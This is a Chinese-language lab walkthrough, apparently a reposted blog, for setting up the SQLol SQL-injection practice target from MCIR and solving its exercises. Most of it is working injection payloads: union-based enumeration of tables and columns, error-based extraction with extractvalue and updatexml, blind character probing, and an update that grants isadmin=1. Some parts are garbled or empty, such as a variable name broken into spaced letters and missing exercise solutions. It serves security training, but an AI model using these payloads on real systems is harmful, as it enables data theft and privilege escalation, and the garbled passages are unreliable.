搭建SQLo靶机与练习

SQLol安装
实验器材：Window 7 windows 2008
下载地址：http://github.com/SpiderLabs/MCIR
安装流程：
Window2008配置：
解压压缩包到网站根路径（比方，我新建一个sql目次，存放压缩包内容）
解压MCIR压缩包到c盘/xampp/htdocs/sql

打开c盘/xampp/htdocs/sql/sqlol/includes
/database.config.php 修改                              u                      s                      e                      r                      n                      a                      m                      e                      /                          username/               username/password等信息；

右击用vim编辑器打开编辑：

修改                              u                      s                      e                      r                      n                      a                      m                      e                      /                          username/               username/password等信息；

打开http://localhost/sql/，可以看到如下界面，点击RESET，即可完成数据库的安装。

出现Done搭建乐成：

返回如图使用：

选择输出效果：所有效果和没有错误信息

出现14个训练题：

0.训练:
’ or ‘1’=‘1

1.训练：
查找数据库
’ and 1=2 union select
concat_ws(char(32,58,32),user(),database(),
version()) #

查找表
’ and 1=2 union all select
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘sqlol’; #

查找列
’ and 1=2 union select
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘ssn’;#

显示所有字段
’ and 1=2 union select
concat_ws(char(32,58,32),name , ssn ) from ssn #

2.训练：
显示所有字段
1 and 1=2 union
select concat_ws(char(32,58,32),name , ssn) from ssn; #

3.训练
查找数据库
’ and 1=2 union select
concat_ws(char(32,58,32),user(),database(),version()) #

查找表
’ and 1=2 union all select
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘sqlol’ LIMIT 1
OFFSET 1; #

查找列
’ and 1=2 union select
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘ssn’; #

显示所有字段
’ and 1=2 union select
concat_ws(char(32,58,32),name , ssn ) from ssn LIMIT 1 OFFSET 1 #

4.训练
查找数据库
’ and (extractvalue(1,
concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and ‘1’=‘1
给堕落误信息分析：

显示所有字段
’ and (extractvalue(1, concat(0x7e,(select
concat_ws(char(32,58,32),name , ssn ) from ssn LIMIT 1 OFFSET 1)))) and ‘1’=‘1 #

5.盲注训练
’ or ascii(substring((select
user()),1,1)) = 111#
（1）无反馈:

(2)从111试到了114出来了效果：（111-114是对应ASSIC表中
小写字母o-r）
’ or ascii(substring((select
user()),1,1)) = 114#

6-7.训练：
’ or
updatexml(0,concat(0x01,(SELECT concat(name,’ ‘,ssn) FROM ssn limit 0,1)),0) #

.训练：
’ uNion seLect
concat(name,’:’,ssn) from ssn uNion selEct null from users whEre
username=’

9.训练
admin’, isadmin = 1 WHERE id = 3#

10.训练
concat(name,’:’,ssn) from ssn#

11.训练

12.训练：
1’ and #>
脚本已注入数据库，每次都会弹窗。

13.训练
chuNk mACRUnFast%
通过编写脚本或使用 SQLMAP 举行猜测盘算，当猜测正确的时候返回
值是“Got results!”（因为 Python编程与 SQLMAP）

改了显示信息栏显示的效果：

来源：https://blog.csdn.net/weixin_51167520/article/details/111991991
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！